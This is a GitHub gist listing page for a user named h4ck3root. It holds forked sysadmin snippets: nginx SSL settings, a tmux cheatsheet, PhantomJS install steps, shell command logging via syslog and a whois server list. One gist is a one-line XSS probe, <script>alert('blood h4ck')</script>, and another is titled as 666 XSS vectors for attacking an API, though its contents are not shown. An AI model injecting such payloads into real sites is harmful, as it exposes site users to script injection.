Colin Shen h4ck3root

@h4ck3root
h4ck3root / nginx.conf
Created April 29, 2019 10:00 — forked from fotock/nginx.conf
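Nginx SSL security configuration best practices.
# Generate the dhparam.pem file; run either method on the command line:
# Method 1: very slow
openssl dhparam -out /etc/nginx/ssl/dhparam.pem 2048
# Method 2: faster
# No noticeable difference from method 1. 2048 bits is sufficient; 4096 is stronger
openssl dhparam -dsaparam -out /etc/nginx/ssl/dhparam.pem 4096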
@h4ck3root
h4ck3root / tmux-cheatsheet.markdown
Created March 20, 2018 11:08 — forked from ryerh/tmux-cheatsheet.markdown
Tmux shortcuts & cheat sheet

Start a new session:

tmux [new -s session-name -n window-name]

Restore a session:

tmux at [-t session-name]
@h4ck3root
h4ck3root / 666_lines_of_XSS_vectors.html
Created November 27, 2017 18:12 — forked from JohannesHoppe/666_lines_of_XSS_vectors.html
666 lines of XSS vectors, suitable for attacking an API copied from http://pastebin.com/48WdZR6L
@h4ck3root
h4ck3root / test.sh
Last active October 23, 2017 07:18
<script>alert('blood h4ck')</script>
TEST
@h4ck3root
h4ck3root / 00.howto_install_phantomjs.md
Created May 5, 2017 09:28 — forked from julionc/00.howto_install_phantomjs.md
How to install PhantomJS on Debian/Ubuntu

How to install PhantomJS on Ubuntu

Version: 1.9.8

Platform: x86_64

First, install or update to the latest system software.

sudo apt-get update
sudo apt-get install build-essential chrpath libssl-dev libxft-dev
@h4ck3root
h4ck3root / log-all-zsh-bash-commands-syslog.md
Created March 8, 2017 10:26 — forked from dayreiner/log-all-zsh-bash-commands-syslog.md
Log all users zsh / bash commands via syslog without 3rd-party tools or auditd

Sending Bash and ZSH Commands to Syslog

Also posted here: http://18pct.com/sending-bash-and-zsh-commands-to-syslog/

Your bash/zsh history is great if it's complete, but it doesn't capture commands across all users, sudo's, root commands etc. In particular with test environments, someone may perform a "one-off" procedure and then months later it needs to be repeated. It would be nice to be able to look up what the user did at the time, and searching through multiple, possibly truncated history files is a pain.

Tools like typescript are great if you're actively documenting, but they're not something you would use all the time in practice, and they capture more than just a history of your commands. There are third-party tools like rootsh and Snoopy that can accomplish this, but third-party tools can be overkill if all you want is a quick reference in a re

@h4ck3root
h4ck3root / whois.conf
Created January 11, 2017 07:28 — forked from thde/whois.conf
/etc/whois.conf WHOIS records for nTLDs (https://thde.io/whois-command-line-new-gtld-guru-watch-zone-link/)
##
# WHOIS servers for new TLDs (http://www.iana.org/domains/root/db)
# Current as of 2016-10-07
##
\.aarp$ whois.nic.aarp
\.abarth$ whois.afilias-srs.net
\.abbott$ whois.afilias-srs.net
\.abbvie$ whois.afilias-srs.net
\.abc$ whois.nic.abc